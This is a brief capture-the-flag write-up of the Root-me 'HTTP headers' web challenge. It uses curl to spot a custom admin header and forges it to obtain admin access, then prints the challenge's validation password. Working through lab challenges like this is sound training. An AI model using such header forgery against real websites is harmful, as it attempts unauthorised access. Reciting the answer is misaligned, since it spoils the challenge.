Root-me

HTTP headers

HTTP response give informations

The statement says “Get an administrator access to the webpage.” seems pretty straight forward.

We’ll curl the challenge and dump the header

 curl -i http://challenge01.root-me.org/web-serveur/ch5/index.php
 
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Nov 2017 01:25:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Header-RootMe-Admin: none

....

There’s an odd field the one called Header-RootMe-Admin it’s set to none.

Let’s sent a request with that field with different values. After trying a few admin is the value that we’re looking for.

 
   curl -H "Header-RootMe-Admin:admin" http://challenge01.root-me.org/web-serveur/ch5/index.php
   
...   
<html>
<p>Content is not the only part of an HTTP response!</p>
<p>You dit it ! You can validate the challenge with the password HeadersMayBeUseful</p></body>
</html>